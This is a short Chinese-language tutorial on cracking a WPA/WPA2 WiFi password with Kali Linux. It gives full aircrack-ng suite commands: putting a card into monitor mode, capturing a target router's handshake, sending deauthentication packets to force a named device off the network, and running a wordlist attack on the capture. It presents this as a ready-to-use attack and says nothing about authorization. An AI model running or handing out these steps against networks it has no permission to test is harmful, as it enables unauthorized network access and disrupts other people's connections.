kali破解wifi密码

前期准备

kali Linux操作系统 支持监听模式的网卡 字典文件

检查网卡

先输入airmon-ng命令检查网卡是否支持监听模式

启网卡监听模式

接着启动网卡的监听（monitor）模式

airmon-ng start wlan0

输入iwconfig确认一遍，确认已进入monitor模式

iwconfig

开启监听模式（monitor）后，wlan0会变成wlan0mon

搜索周围网络

使用airodump-ng命令可列出无线网卡扫描到的WiFi热点详细信息，包括信号强度、加密类型、信道等，这里我们要记一下要破解的WiFi的bssid和信道。当搜索到我们要破解的WiFi热点时可以Ctrl+C停止搜索。

airodump-ng wlan0mon

抓取握手包

使用网卡的监听模式抓取周围的无线网络数据包，其中我们需要用到的数据包是包含了WiFi密码的握手包，当有新用户连接WiFi时会发送握手包。 参数解释： -c指定信道，目标热点的WiFi信道 -bssid 指定目标路由器的bssid -w 指定抓取的数据包保持的目录

airodump-ng -c 1 --bssid E4:F3:F5:17:86:F4 -w ~/wifimm/ wlan0mon

强制连接到WiFi的设备重连路由器 现在我们使用aireplay-ng命令给手机发送一个反认证包，使手机强制断开连接，随后它会自动再次连接WiFi。 可以看出，aireplay-ng生效的前提是WiFi热点中必须至少有一个设备已经接入。 由于刚刚打开的终端一直在执行抓包工作，所以我们重新打开一个终端，输入命令： -a 指定WiFi热点的bssid -c 指定要攻击的设备MAC地址

aireplay-ng -0 2 -a E4:F3:F5:17:86:F4 -c A8:0C:63:C8:81:19 wlan0mon

此刻我们已经成功抓到了握手包，如下图

破解密码

上面已经成功抓取到了握手包，现在要做的工作就是将握手包的密码和字典中的密码进行匹配。 这里我们直接用系统自带的默认字典破解。 -a2 代表WPA/WPA2的握手包 -b 指定要破解的wifi BSSID -w 指定字典文件

aircrack-ng -a2 -b E4:F3:F5:17:86:F4 -w /mm.txt ~/wifimm/*.cap

最后是抓取的包 密码已经破解出来了